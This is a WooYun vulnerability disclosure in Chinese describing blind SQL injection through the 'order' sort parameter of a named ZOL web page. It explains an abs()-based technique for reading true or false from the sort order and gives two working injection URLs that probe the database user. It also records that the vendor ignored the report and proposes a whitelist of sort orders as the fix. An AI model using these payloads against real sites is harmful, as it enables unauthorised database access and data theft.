漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-07406
漏洞标题:中关村在线order by语句的盲注思路的分享
相关厂商:中关村在线
漏洞作者: 小雨
提交时间:2012-05-22 12:19
修复时间:2012-05-27 12:20
公开时间:2012-05-27 12:20
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-05-22: 细节已通知厂商并且等待厂商处理中
2012-05-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
基于order by内容的盲注
详细说明:
对 http://active.zol.com.cn/diy/bisai.php?mont_h=2009-05&id=12&type=15&order=zj_vote+desc 做安全检测。
尝试数值型注入未果。
不过,看到zj_vote+desc,想到这里也许能利用。
用工具扫它没发现注入。因为mysql的union前不能带order by。
但是order by里的内容是不是就没法注入了?
我不死心啊。
做了一些尝试,发现order by是可以盲注的。
这种方式依赖数据库结果中必须存在一个已知存在不一样数值的列。
不过,既然程序里order by那个字段了,那么那个字段理论上肯定有多种值的。比如本例中的zj_vote字段.
漏洞证明:
看排序。236和239数值相差3,我构造一个abs(zj_vote-237-(expr)) asc.
(expr)为假时,(239-237-0)=2,(236-237-0)=1,236排前面,
(expr)为真时,(239-237-1)=1,(236-237-1)=2,239排前面,
你也许会说,你这个236和239相差是3,当然简单了。如果相差2呢?
比如236和238怎么办?
不卖关子了,直接告诉你吧,他不是相差2么,你可以用abs(zj_vote-236-(expr)*3)啊
http://active.zol.com.cn/diy/bisai.php?mont_h=2009-05&id=12&type=15&order=abs(zj_vote-237-(length(user())>20))+asc
http://active.zol.com.cn/diy/bisai.php?mont_h=2009-05&id=12&type=15&order=abs(zj_vote-237-(length(user())=20))+asc
修复方案:
做一个允许的排序方式组合的数组,排序方式传排序方式的数组下标就可以了。
想直接传字段也可以,检查一下那个排序方式是否在数组里,不是就用默认排序方式。也就安全了。
版权声明:转载请注明来源 小雨@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2012-05-27 12:20
厂商回复:
漏洞Rank:6 (WooYun评价)
最新状态:
暂无